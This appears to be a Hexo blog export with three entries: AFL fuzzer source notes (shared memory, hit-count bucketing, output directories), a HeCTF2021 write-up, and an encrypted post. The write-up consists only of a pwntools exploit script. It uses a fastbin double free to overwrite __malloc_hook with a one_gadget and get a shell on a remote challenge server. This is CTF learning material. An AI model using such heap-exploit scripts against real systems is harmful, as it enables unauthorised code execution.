<h2 id="setup-shm"><a href="#setup-shm" class="headerlink" title="setup_shm"></a>setup_shm</h2><p>Sets up <code>trace_bits</code> and <code>virgin_bits</code></p>
<ul>
<li><p>If <code>in_bitmap = 0</code>, the array is initialized to 255 (0xff) with <code>memset(virgin_bits, 255, MAP_SIZE)</code>. <code>in_bitmap</code> is tied to the -B option</p>
</li>
<li><p>Initialization continues with <code>memset</code>: <code>memset(virgin_tmout, 255, MAP_SIZE); memset(virgin_crash, 255, MAP_SIZE);</code></p>
</li>
<li><p><code>shm_id = shmget(IPC_PRIVATE, MAP_SIZE, IPC_CREAT | IPC_EXCL | 0600);</code></p>
<ul>
<li>Prototype: <code>int shmget(key_t key, size_t size, int shmflg);</code>, creates a shared-memory segment<ul>
<li>First argument: the program supplies a key (a non-zero integer) that effectively names the shared-memory segment; on success shmget() returns a shared-memory identifier (a non-negative integer) associated with the key, for use with the other shared-memory functions. On failure it returns -1<ul>
<li>Here the key is IPC_PRIVATE, so shmget() creates a new shared-memory segment</li>
</ul>
</li>
<li>Second argument: size, the amount of memory to share, in bytes</li>
<li>Third argument: permission flags<ul>
<li>IPC_CREAT: create the shared memory if it does not exist, otherwise open the existing one</li>
<li>IPC_EXCL: create the new shared memory only if it does not already exist, otherwise fail with an error</li>
<li>0600: each digit denotes one kind of permission: the leading 0 marks the number as octal, the 6 gives the owner read and write, the next 0 gives the group no access and the last 0 gives others no access</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p><code>atexit(remove_shm)</code>, registers an exit handler</p>
<ul>
<li><p>The registered function is <code>remove_shm</code></p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">remove_shm</span><span class="params">(<span class="keyword">void</span>)</span> </span>{</span><br><span class="line"> shmctl(shm_id, IPC_RMID, <span class="literal">NULL</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
</li>
<li><p>Prototype: <code>int shmctl(int shm_id, int command, struct shmid_ds *buf);</code></p>
<ul>
<li>First argument: shm_id is the shared-memory identifier returned by shmget().</li>
<li>Second argument: command is the operation to carry out; it can take three values<ul>
<li>IPC_STAT: set the data in the shmid_ds structure to the shared memory's current associated values, i.e. overwrite shmid_ds with the segment's current values.</li>
<li>IPC_SET: if the process has sufficient permission, set the shared memory's associated values to those given in the shmid_ds structure</li>
<li>IPC_RMID: delete the shared-memory segment</li>
</ul>
</li>
<li>Third argument: buf, a pointer to that structure</li>
</ul>
</li>
</ul>
</li>
<li><p>If not in <code>dumb_mode</code>, set the environment variable <code>SHM_ENV_VAR</code> to <code>shm_str</code>. <code>dumb_mode</code> is tied to the -n option</p>
</li>
<li><p><code>trace_bits = shmat(shm_id, NULL, 0);</code></p>
<ul>
<li>Right after creation the shared memory cannot be accessed by any process, so shmat is called to enable access and attach the segment to the current process's address space</li>
<li>Prototype: <code>void *shmat(int shm_id, const void *shm_addr, int shmflg)</code><ul>
<li>First argument: shm_id, the shared-memory identifier returned by shmget()</li>
<li>Second argument: shm_addr, the address in the current process at which to attach the shared memory; usually NULL, which lets the system choose the address</li>
<li>Third argument: shm_flg, a set of flags; usually 0</li>
<li>On success returns a pointer to the first byte of the shared memory; on failure returns -1</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="init-count-class16"><a href="#init-count-class16" class="headerlink" title="init_count_class16"></a>init_count_class16</h2><p>Bucketing of path hit counts.</p>
<p>trace_bits uses one byte per path to record both whether the path was reached and how many times it was hit; the bucketing table is <code>count_class_lookup8[256]</code>. Before each check for whether a new path was discovered, the hit counts are first bucketed, e.g. 4 to 7 hits are all counted as 8 hits.</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">const</span> u8 count_class_lookup8[<span class="number">256</span>] = {</span><br><span class="line"> [<span class="number">0</span>] = <span class="number">0</span>,</span><br><span class="line"> [<span class="number">1</span>] = <span class="number">1</span>,</span><br><span class="line"> [<span class="number">2</span>] = <span class="number">2</span>,</span><br><span class="line"> [<span class="number">3</span>] = <span class="number">4</span>,</span><br><span class="line"> [<span class="number">4</span> ... <span class="number">7</span>] = <span class="number">8</span>,</span><br><span class="line"> [<span class="number">8</span> ... <span class="number">15</span>] = <span class="number">16</span>,</span><br><span class="line"> [<span class="number">16</span> ... <span class="number">31</span>] = <span class="number">32</span>,</span><br><span class="line"> [<span class="number">32</span> ... <span class="number">127</span>] = <span class="number">64</span>,</span><br><span class="line"> [<span class="number">128</span> ... <span class="number">255</span>] = <span class="number">128</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>In the actual bucketing, two bytes are processed at a time, using <code>count_class_lookup16[65536]</code></p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="function">EXP_ST <span class="keyword">void</span> <span class="title">init_count_class16</span><span class="params">(<span class="keyword">void</span>)</span> </span>{</span><br><span class="line"> u32 b1, b2;</span><br><span class="line"> <span class="keyword">for</span> (b1 = <span class="number">0</span>; b1 < <span class="number">256</span>; b1++) </span><br><span class="line"> <span class="keyword">for</span> (b2 = <span class="number">0</span>; b2 < <span class="number">256</span>; b2++)</span><br><span class="line"> count_class_lookup16[(b1 << <span class="number">8</span>) + b2] = </span><br><span class="line"> (count_class_lookup8[b1] << <span class="number">8</span>) |</span><br><span class="line"> count_class_lookup8[b2];</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
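<p>To show what the two tables buy in practice, here is an added example (not AFL's code) that builds count_class_lookup16, classifies a constructed trace map and compares it against virgin_bits; MAP_SIZE is shrunk to 16 bytes and has_new_bits is a simplified stand-in for the check afl-fuzz runs after each execution.</p>

```c
/* Added illustration (not AFL's own code) of what the count-class tables do:
 * raw hit counts are bucketed before a trace is compared with virgin_bits, so
 * 5 and 6 hits of the same edge look identical. MAP_SIZE is a constructed
 * 16 bytes here (AFL uses 1 << 16); the two tables keep their real sizes. */
#include <stdint.h>
#include <string.h>

typedef uint8_t  u8;
typedef uint16_t u16;
typedef uint32_t u32;

#define MAP_SIZE 16

static const u8 count_class_lookup8[256] = {
    [0] = 0, [1] = 1, [2] = 2, [3] = 4,
    [4 ... 7] = 8, [8 ... 15] = 16, [16 ... 31] = 32,
    [32 ... 127] = 64, [128 ... 255] = 128
};

static u16 count_class_lookup16[65536];

static void init_count_class16(void) {
    u32 b1, b2;
    for (b1 = 0; b1 < 256; b1++)
        for (b2 = 0; b2 < 256; b2++)
            count_class_lookup16[(b1 << 8) + b2] =
                (count_class_lookup8[b1] << 8) | count_class_lookup8[b2];
}

/* Bucket every hit count in the map in place, two bytes per table lookup. */
static void classify_counts(u16 *mem) {
    u32 i = MAP_SIZE >> 1;
    while (i--) {
        if (*mem) *mem = count_class_lookup16[*mem];
        mem++;
    }
}

/* Simplified has_new_bits: 2 if the trace touches an edge virgin has never
 * seen, 1 if only a hit-count bucket is new, 0 otherwise. Newly seen bits are
 * cleared from virgin so the same observation is not reported twice. */
static int has_new_bits(const u8 *trace, u8 *virgin) {
    int ret = 0;
    for (u32 i = 0; i < MAP_SIZE; i++) {
        if (trace[i] & virgin[i]) {
            if (virgin[i] == 0xff) ret = 2;
            else if (ret < 2) ret = 1;
            virgin[i] &= (u8)~trace[i];
        }
    }
    return ret;
}

/* Constructed run: edge 3 hit 5, then 6, then 40 times. Returns the three
 * has_new_bits results packed as one decimal number (first result is the
 * hundreds digit). */
static int demo(void) {
    u16 trace_words[MAP_SIZE / 2];         /* u16 storage keeps the u16 view aligned */
    u8 *trace = (u8 *)trace_words;
    u8 virgin[MAP_SIZE];
    int r1, r2, r3;

    init_count_class16();
    memset(virgin, 255, MAP_SIZE);         /* nothing seen yet, as in setup_shm */

    memset(trace, 0, MAP_SIZE); trace[3] = 5;
    classify_counts(trace_words);          /* 5 -> bucket 8 */
    r1 = has_new_bits(trace, virgin);      /* 2: brand-new edge */

    memset(trace, 0, MAP_SIZE); trace[3] = 6;
    classify_counts(trace_words);          /* 6 -> same bucket 8 */
    r2 = has_new_bits(trace, virgin);      /* 0: nothing new */

    memset(trace, 0, MAP_SIZE); trace[3] = 40;
    classify_counts(trace_words);          /* 40 -> bucket 64 */
    r3 = has_new_bits(trace, virgin);      /* 1: new count bucket only */
    return r1 * 100 + r2 * 10 + r3;
}
```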
<h2 id="setup-dirs-fds"><a href="#setup-dirs-fds" class="headerlink" title="setup_dirs_fds"></a>setup_dirs_fds</h2><p>Sets up the output directories and file descriptors.</p>
<ul>
<li>If sync_id exists<ul>
<li>Create the sync_dir folder</li>
</ul>
</li>
<li>Create the out_dir folder<ul>
<li>Call <code>maybe_delete_out_dir</code>, which returns the file descriptor out_dir_fd<ul>
<li><code>out_dir_fd = open(out_dir, O_RDONLY);</code><ul>
<li>Opened read-only</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>Create the queue folder<ul>
<li>Create <code>out_dir/queue</code></li>
<li>Create <code>out_dir/queue/.state/</code></li>
<li>Create <code>out_dir/queue/.state/deterministic_done</code></li>
<li>Create <code>out_dir/queue/.state/auto_extras</code></li>
<li>Create <code>out_dir/queue/.state/redundant_edges</code></li>
<li>Create <code>out_dir/queue/.state/variable_behavior</code></li>
</ul>
</li>
<li>If sync_id exists<ul>
<li>Create the <code>out_dir/.synced</code> folder</li>
</ul>
</li>
<li>Create the <code>out_dir/crashes</code> folder</li>
<li>Create the <code>out_dir/hangs</code> folder</li>
<li>Commonly useful file descriptors<ul>
<li><code>dev_null_fd = open("/dev/null", O_RDWR);</code>, read-write mode</li>
<li><code>dev_urandom_fd = open("/dev/urandom", O_RDONLY);</code>, read-only mode</li>
</ul>
</li>
<li>Create the Gnuplot output file<ul>
<li>Open the <code>out_dir/plot_data</code> file write-only</li>
<li>Write <code># unix_time, cycles_done, cur_path, paths_total, pending_total, pending_favs, map_size, unique_crashes, unique_hangs, max_depth, execs_per_sec\n</code></li>
</ul>
</li>
</ul>
<h2 id="read-testcases"><a href="#read-testcases" class="headerlink" title="read_testcases"></a>read_testcases</h2><p>Reads the test cases from the input directory and queues them for testing</p>
<ul>
<li>Try to access the <code>in_dir/queue</code> folder; if it exists, reset <code>in_dir = fn;</code></li>
</ul>
]]></content>
<categories>
<category>笔记</category>
</categories>
<tags>
<tag>fuzz</tag>
</tags>
</entry>
<entry>
<title>hectf_2021</title>
<url>/article/hectf_2021/</url>
<content><![CDATA[<h1 id="HeCTF2021"><a href="#HeCTF2021" class="headerlink" title="HeCTF2021"></a>HeCTF2021</h1><!-- 文章页 配置 -->
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">2</span></span><br><span class="line">filename = <span class="string">'flexible'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'123.56.242.200 '</span>,<span class="number">10004</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line"><span class="comment"># libc = elf.libc</span></span><br><span class="line">libc = ELF(<span class="string">"./libc-2.23.so"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'choice >>'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,size,name,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Choice your index >>'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">'size >>'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'what is your name >>'</span>,<span class="built_in">str</span>(name))</span><br><span class="line"> p.sendlineafter(<span class="string">'Input your context >>'</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Choice your index >'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">'Input your context >>'</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Choice your index >'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Choice your index >'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x70</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x70</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x50</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x50</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x50</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x50</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x50</span>,<span class="string">'a'</span>,<span class="string">'b'</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">main_arena_addr = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) -<span class="number">88</span></span><br><span class="line">malloc_hook = main_arena_addr - <span class="number">0x10</span></span><br><span class="line"></span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">realloc = libc_base + libc.sym[<span class="string">'realloc'</span>]</span><br><span class="line"></span><br><span class="line">fake_fast_addr = free_hook - <span class="number">0x13</span></span><br><span class="line">fake_fast_addr = malloc_hook - <span class="number">0x23</span></span><br><span class="line"></span><br><span class="line">one_16 = [<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line"></span><br><span class="line">one_gadget = libc_base + one_16[<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x50</span>,p64(fake_fast_addr),<span class="string">''</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x50</span>,p64(fake_fast_addr),<span class="string">''</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x50</span>,p64(fake_fast_addr),<span class="string">''</span>)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x50</span>,<span class="string">''</span>,<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = <span class="string">'\x00'</span>*<span class="number">0xb</span> + p64(one_gadget) + p64(realloc + <span class="number">14</span> )</span><br><span class="line">edit(<span class="number">6</span>,payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">log.success(<span class="string">'libc_base: '</span> + <span class="built_in">hex</span>(libc_base)) </span><br><span class="line">log.success(<span class="string">'main_arena_addr: '</span> + <span class="built_in">hex</span>(main_arena_addr)) </span><br><span class="line">log.success(<span class="string">'malloc_hook: '</span> + <span class="built_in">hex</span>(malloc_hook)) </span><br><span class="line">log.success(<span class="string">'system_addr: '</span> + <span class="built_in">hex</span>(system_addr)) </span><br><span class="line">log.success(<span class="string">'free_hook: '</span> + <span class="built_in">hex</span>(free_hook)) </span><br><span class="line">log.success(<span class="string">'fake_fast_addr: '</span> + <span class="built_in">hex</span>(fake_fast_addr)) </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># add(6,0x20,'a','b')</span></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>Hexo_build</title>
<url>/article/Hexo_build/</url>
<content><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">
<script id="hbeData" type="hbeData" data-hmacdigest="d65fc150bda30a4734b955a9fd802d46c486f50d8feb33e497007c2d4881feba">
81e7fbd5fbce68f2e642c7fcb882309fdb4cf05b107ba3bd41affdf480605d679614b1a8edabeafbc85cd44cfbc4bcdf0bae34ce1cf299af4d99c42ed49f1669432dfd3e4be2e4fecb6d9e408e5b636c85cb481c2408ce50d3968fa56b98606323c1e66c16fc35be1208e98cdd65524efaabadefad88443fa6cfc137d3c3ad707811a44ce373d04626b46244605949fc05f7a9612c27c31b2ead9fee323713fe52840d390fdcb5091b7fb9fa803df5e42e3cf569b6f98f16cdcca4a21cdc40b0ec519fc629fbb090fd50f18384beb30b00eda11e3f8b8a4ec92213539be04ed23753ad3280bb2fe7d9a4ea7b743c56b37ae743d74dcc6db0cc9a68c88893b6ac5cd53daec42ec230b32f3fe34cbc3e72a2c9c348fb95db71d60c9faaf206c3034586f3e22f9c741885a96a96788b1c93b41439f84437d14205d16ec304d8ccc197342f8499707bf4ce8ae04da974e8e14242a94a0ece3a3c5435a5a9071d27e22affb94222bc63e9669d5f8d7681bf10ffb307f4e682c1dd737d0202263435f910ffd21d843fd91de7b2374983f55db2c4bdd6c7d2899afb291411e889bf09c32986af688280e30bf17dca8d0ad4b04ca81e57ce9621787871e304241d951826809df7f489e53f5905e37dcc6fa7b0558d46b3e15ed66da07a3bf9fda86438fcfff2a0924d98450a5d046c015b7680168893cc05660e60cfc97c8855eb1e99dead3bf63d4bbe247668a4b943bfa80c692d50b7170d330d80476af56fcb7d98c1de12eaba601abc2e6403509ca3ae67923812af0842fb7b2cd943e74acb7836e5793e65f09afd2d4e651829150c7097fdcb4647cb7870f09631b2bcefe7b92491016fa9558bf6e779fec0eef7e85e8bf0d8c9e99fcc28b65bd1bec4bcd114c519f4c8074a2670ff2a3549bfa2227baff24fa8b5e11df09ab4e3294a806fd1d958c33ca29e2a21392435a747d397896ae739d269405e65759d7828524e9334be1af1d0b71ffaf32c16b15090636c233543863c0d0dff6bbcc4b71da25704012a82bcad4091e1687d117cf4b58c6aa80eb1942eb963f3d392351303c784c16071e24cffc5dea38241b9cc929ed819da35ae9ba873249e6912fa9b721d4e7ab971be14dcae4a8e0bf3631df87c7a21e974b98a8665727c8804f68a36a6ba4bfef9119839b05f7bb1bfc93afcbd5bf9b3908d5f782dc6b4526bd57eb50adea1e6c987afe086a5df605b49bd0e07e77bba7eb121f95acddd3b7e7d52f314138297f17254833c5c950a0fb533ba996b9b63a26e02f6701398593149d5994d4db095cdd4706419d94fefd0aa6d07e6bb6a2c19fc911f803603608312b5aa9236c388a3ac82caf3d9c81b3ddb810ded0503789bdf5841aa00ad733de5b45de3be3e7450bce1c6a43ffb93e05a
f20c57c70b8350ad25146f7cbcbb9c8a7f0060929d859400ee71f535b35a57386241e4e34611ff1a61d727092c1172defd1b4ce75e51cf5c88d7f6583c7f2add1f4264f92af8879ab396b2f72363274f468bb2846837e1180ffba8d8ad88f5d1c5508bbeea6ca1c6c362d3438b824266d0708acfa4031840473a2e5c68022d04e376fd8a01949b51156c281ffbcc7ea51dd9f6bffbc46ee79d7ae4ee6cb85979eb5f489f4adbef67bcbd60614676a280a40f47fb6109c75cf7740a4e3277d598d9026790040be346b96917e6e67d07ad684f9aca94911c579af63595be2b45eca7284a93b583007f24ebd2d0fb63e3b573cd8dce0ddee8a876b98aef2edb172efe5d1d5c91c2508616b9e9f5ee2d196301308251351c4082c6f2bd3df52080a7d246a02f0c0a4fd087937848926ad53d4cf800436d0da50374339402e401105408a85bf9d49fbce2a4096c7f786bbbbfc71e72d1383e55c5958ca35fed75c657f73e0831c02edf7ab44383d1ec415db8f3d78a15fd65309d8b5b5e91396f7dde4818d04c1f6ce44b8d083977989b1773b6c41f4ae2d24b5a2b1e45a8bddf750e701db577977cf77d761238db21b658a0e05e1133dd9b00512784b0602f6ba8eae5e1a7f527d82e96e0ddf1f46714464e67ecc34c2cf15910f204338de6a93adaaa23516efea2a8b3863b2f10ab63879f1006fb6d2ffae5ae4e9522e6428301ad236edfa7e1c94745a59d68ee686088dc134ab587f945ebab48988bf272166871909eb8936baa28b7c39400275e7519e6d6e7053dd6bccaac2bec002369fe8cbb280336a4a580e2f15e09b4696cec313a5e2a8717a7c4d776b3880381baee1244334ccae1a8ec7b78f9893fe81115f7faa975cd7abc7214b30ca1a29c8d2030c662218c038ed7197b135a511c205f661ed8b01a4dc0ae35b52f8e4c8f0956c58a32c260679e141b3d2d6579545808da23e203c0330784b3e28bd6450a604577388a04cee374b8ac050bb3704174abf77ab3ba18cf5e311f3f06083706991bfee52c4cea48e72d8cc8916d32fd6b87d52a58151ce50e73eff114707648c089d37ef6563586e7011f5baf2d54386f5d989b38e3bf6afefeae9ace667477811e1d60be230747f0c7adb82a37b596980cdc96e631665ddb29b556219e4dac192cb1b537a98d1aee5c81c35e51395813ccc4fa9145ed25c08532bfcb92a2d0621bf4254af8e316baa0e8dfbb3f9075363868c6ea1fd191ce7e5d6d98ff71950bcd51c64483317bd67859e5f4a72fcf99618f693d51062e9d71c6c8e76d930600566e6535c1fcf76c39ab67530e5bcb1cf19c05bbddf432bab374febe73d1116e63aed27efbe5634d44945657b9548548dbf993717652258b7191ebb42d0b100a8fc93a34abd13e6d1fb5ff
831eb665639948518024eb84e7823fed060da1eae1a55032daf224fa1db778bedde8c5a95892e1b2a3c71406f59cd33b1576a0aa754ae0153b3b44c8286510b23d5c2fd171dfa2be666544d125246219f3ed32f1e2497622543ce62b1296764724bfbb6c0f649bfa8613cae1f729b7df68bb72d7cbacc917ec453586652f6a8419de7755232527c9ce195d80813f70a051d0ef3f1e340a22fa12add8e7af151e1311a6c6fb2e32f8022990a0a3da12a78de08ed13b74da839d991c628fb79b2468c98e5382f106fef3036d269ee930383e01dd1bd5b4347b8b20aafd819170a298d90a2bf3d600573474c61a912b1209bf671ff19851d134f9a4325648b76c9811f73dec2a04de994acc0d70499da65175c5d4bbaab43773041b6a027c16ac7a5fa6d5886c45ccf14a3efeffdfc308a5c3185f43be66f74915b8fc2efbb6cf547a799e5cf6e8ea7abf56715e20fdb4dcc52649521a7afcfbd35ed3ba63c8b1cccb9479832d16576988d2677dad4e0cd7a6fd5f7417fa79aea860c741c595aa005a384cecd23237e4b0b6166e982681c0b42eecea30c05a93a41499499aee7005c6643a8980e3cd7a6ecc51183be1029ad621689258fe7a1f4e1be72af92660ad6e1a9b3af33a72fe43058b7040a25b89b87396d931a1f5cdef424de45c0403cfa499c4c3e886ff5c08c3a6025545a14d8324a4042214c76a726cf5bb686415f3c0a8623e4d799aa30c2f9d1e1a682e94712bb3d2df515c5b3d542df4caa259ee9381d675a7bc397cf3efc945af5f33900c1254bc06fb9a78713ea0a00d0f9182666a448e56319570d53809130c8f8b03374639253a87db1f314ac494d29ba1d6534e542c404e5b72abee0079f8b6f16094ef0a72dbba71f0a9a266884266b179256a5ce7980f3f0f12fb91094cdc3cc05b8418291b281c5349f903fc1712c8ea60232d09ad2e40815ce91a3a18e54807fd42d855f9614b703c71ec3a448c0e80e4e350e714eace658c28b28398fe5f4a34d259cceda6abce0379b5ed6354e0bbd64a546ae1239ab9245ad9d4ef8398e77ee0be41171f8f931fc1a5a584840cc5775d3307c490cfe1bdf1082d1123311320386adb3ca4f2c6f7ad831ea416fe1c83850313ca6f14cd7f89d520738666ff6226b8f6625ceace67479b3cb8ba51bc1eea049c7b22dfe6f21bcadfc458eda082d0c35e3af99ca6183a28220e7286dfc6e9eacc430e4ae3dd6e0c366b5cd9123a0a3668f82dd49c8bb2cf17e584da3a9cb037726d8f741e6f1f4a4a7db0254bedd1a5f8b08226bd1e25f0be482090456fce812aa841adc388cec1315d503adc66edfedc5c04002d1fdbce2a538a8e30701e43d2a19917690b70d97ed93f5bde88987759bf254268a7545314f4383ec49e48f966c5244a84
8241562e30b32bbfd9329f5cac82f2a02dd22ba81c1ef3a64e837ecf7d1dd1083d0ebfc1619c7a3cec565e80dcb03e714a41ad646dc22796e4309ee597bcfc023d362076666eefbf1567edbfd19b548f56e63a9c15faa95cbf0da9b97ac06cca90bb31f11ed05e0eaa1016aceed898c90db6f13127dc62c82c5490b62a69c09fd0c156e770c89b1e4d5e1b231cabc819971bf614366805d70c95f5faf88826e853bdda8c816c778cc1712af5a8ebabbd5ab2c78cb6b3e668e6817700162d382ffe7a8025830c2fd0a4f67d95d2a4c09fbe5c25a4fbec2b371ec5e5db131d4a1e8b81e462903e07b179945b8a7c02f0eb60a19cd288e5016c0a5fc02c64b02484b68075a4d39531752172965f09ac63e0efd5d69f09073fa2c9cedb22f3a79ba30bc5d19e147eddac058870a06ba8d90dfeda61cd2b4a6d0042c3edba8ef7761630d10d5d8d034f02f07b5c9f9f5727129f66b994ffc463cc231d3a6851e2015ce5ed159a4b90c49c88819490266374e31b2882d387003dc6f43dd5659aeb956198767d62b37e90daf86d0470acf9903a7cc034cc3fdfbc8c6dca65f5e42b07e28fa6fef9a8adb8ef4844a1ea0a9d2dac44066ae8ba141d81eca4d760778f7cd0807c746fb2f43d5c8b177ed9a9599d509b88184a75623b5fed552b14551b672c7008646f406829c5ec05ac3b31173fec351a86200dd8b25c380f55bb7316d22f6ab169b4432a25e04ae6c6343effb3d5b6fc9c023bab8e50314a06fbc5801c5a4961c5fad5d7eb1631bc00c01c08514e63ff4c96a56594409d6cd5a4bed7049b5741337be35e17ef469d63283aaeb8881e99632bf889981a809b0fc2bfd49c4b4eda10a1826b0f6bb3beabe3315cf412c7218262c2acf679003df748fab192d4ce23d70025fef9f418511ce168a8afd7eb6c3bb3f7cb41a8b93acd10ac22ffb19ad6f1c5b32d9415b3c6db6aedd5ce0c7719d1582133f1ddefa37f13d831d1f0b3cf3c6ce4b0f89aa142ee1ffe170bb5203268ab60e543a36c692587924be1eeb97bdb476f4c3e3bb5f9f1a50feacde550d8f28830d03818680d23ed8edee1b20f861c705f10f767cc57c7464240790ddf7607b926eadab8ebb7e821e4df0ffc12fce369206d78a3a61b7146bf1f2f81845c6615649dae4a81eb190d5dcdbcda1e8fc6d5c9a51e7eeed866df6fd07e4e1fc49527c1aa8dd31294abb0de4170caeb05b3e6b2149d192b24f0c23bebbe68e9418b3ee1c042108306aecd0a1fdba8e6734cd723acf6aa35b1bdf734e6fc53f4db2fe772d5e3280504783ec2656b646cf588cbd2f1240dea65acb46772c2025c6595218e12054283d317cf36562bcecbe51fcd5840c5980e62ec3975e89a1097af7b1940a83b54fa2b43904eb2d33f548fe4cab9faabf1
